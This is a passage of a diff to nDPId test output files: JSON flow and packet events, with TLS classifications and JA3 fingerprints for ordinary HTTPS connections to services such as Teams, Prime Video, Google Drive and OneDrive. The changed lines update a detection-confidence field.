{"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495669804,"flow_last_seen":1646495669804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495669804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1646495669804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669804,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GxZAAEAGN4nAqAGAbIq5aoOAAbvmWe+jAAAAAKAC+vCvxQAAAgQFtAQCCAqEU9WfAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1646495669812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669812,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8yYIAAPcGEhxsirlqwKgBgAG7g4CERzW35lnvpKAS\/\/\/nPAAAAgQFoAQCCArIqUDThFPVnwEDAwg="} 
01164{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1646495669817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495669817,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5GxhAAEAGNYrAqAGAbIq5aoOAAbvmWe+khEc1uIAYAfZdLwAAAQEICoRT1avIqUDTFgMBAgABAAH8AwN96ffJWUDTazcjPKRqPmlOCDA7EP6e0q+5Knlqzgn4siDXwLeA2RnsV46x7ZH7OaLw+Chjc3EP4ZBJc+xWJC0l1wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cucHJpbWV2aWRlby5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgGExhTuOW51jqeKeMnZIkirN5TNVDUu2atdTJKyWyDBgAFwBBBNa6zHPDKyGGZ8TLrmG8xe75hAb+vBq5zYOy2EFwzMFPukEZchYJ5onOljVZmDEEihxmPvbweI2eyfjNpyF4jCAAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495697787,"flow_last_seen":1646495697787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495697787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1646495697787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TvVAAEAG4RXAqAGAjvq5jtyKAbuisGnHAAAAAKAC+vDU+wAAAgQFtAQCCAq56si5AAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1646495697803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697803,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8kPwAAHIGrI6O+rmOwKgBgAG73IpV9E4KorBpyKAS\/\/903wAAAgQFlgQCCAoX\/J8euerIuQEDAwg="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1646495697805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495697805,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5TvdAAEAG3xbAqAGAjvq5jtyKAbuisGnIVfROC4AYAfb\/+QAAAQEICrnqyMsX\/J8eFgMBAgABAAH8AwMm2R5Ju93q7BO1hUBCbI67+PD2u7\/isSvjCgLKpqok\/yCAWXfAe1hCLkH2e7v9afeyqpqQSwrsncirtbeBJ9H19AAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBkcml2ZS5nb29nbGUuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIN3ozE7d4X5ID5WvLeFvcVfA+y6MygI54w6MzPaYwOcyABcAQQTFpbayzL1z3QPN8cTTIDg5o4CXfe8\/xuT5UCf9QOlCuSljPogKq5ahl7f7neEgUhdrgF5Z8PWW8a+71cG5NS4HACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710343,"flow_last_seen":1646495710343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710343,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1646495710343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710343,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tchAAEAGPx\/AqAGADVF2W4FOAbtTwyfkAAAAAKAC+vBryAAAAgQFtAQCCAom4HXhAAAAAAEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1646495710376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0mxFAAG4GK94NUXZbwKgBgAG7gU7a1m2vU8Mn5YAS\/\/\/iBwAAAgQFoAEDAwgBAQQC"} 
01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1646495710381,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710381,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAIttcpAAEAGPSzAqAGADVF2W4FOAbtTwyfl2tZtsFAYAfZlCgAAFgMBAgABAAH8AwMcPgJU1zrnl+hPKuEgTOmCA8DSxG0x4ZP+nrnS1ukwmSB2tLYK4RsCmYHQ+tv7RzCytXVHC3ipih0buXJEGgMzzAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxvbmVkcml2ZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgkhEItWzjEiug\/WBaiPCJVLwOMCFSobcq6gZ3ZM5d7hUAFwBBBKUDUTjCPdZ8Ll1S+z857hqnZsJZ3Vatea3adXIfU3XxBdTrso0nY7PLm8teDMagz\/bdRE3yXoqXxIphrdW4ROsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} 
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, 
O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710534,"flow_last_seen":1646495710534,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710534,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1646495710534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710534,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CqVAAEAGNnfAqAGADWsqDd4EAbvOscftAAAAAKAC+vD21AAAAgQFtAQCCArXIg8YAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1646495710555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710555,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0VKNAAHUGt4ANayoNwKgBgAG73gT+RZAmzrHH7oAS\/\/9wpwAAAgQFoAEDAwgBAQQC"} 
01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1646495710557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710557,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItCqdAAEAGNITAqAGADWsqDd4EAbvOscfu\/kWQJ1AYAfaM8QAAFgMBAgABAAH8AwNoOd\/HU8dseMv53a0gjDg57feHmv3ZKYt3PSUCEOAz7yDC+9qh9Lsnn2pjQO0NmdEK9+51DwzlDpkQTXJ0hGSXhgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFvbmVkcml2ZS5saXZlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAI7FYCMeLngdMxbkPLy3IoQelSFCsyCvetq1oFf6z+UQAXAEEEWlI8xcTn+Mao6N7i2Le6X1KJI9pYZKIE\/2dqJMzsIrHC0C7HZlpYDP5BCM3Qrb983QL8azL17uscE+MtJARpvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": 
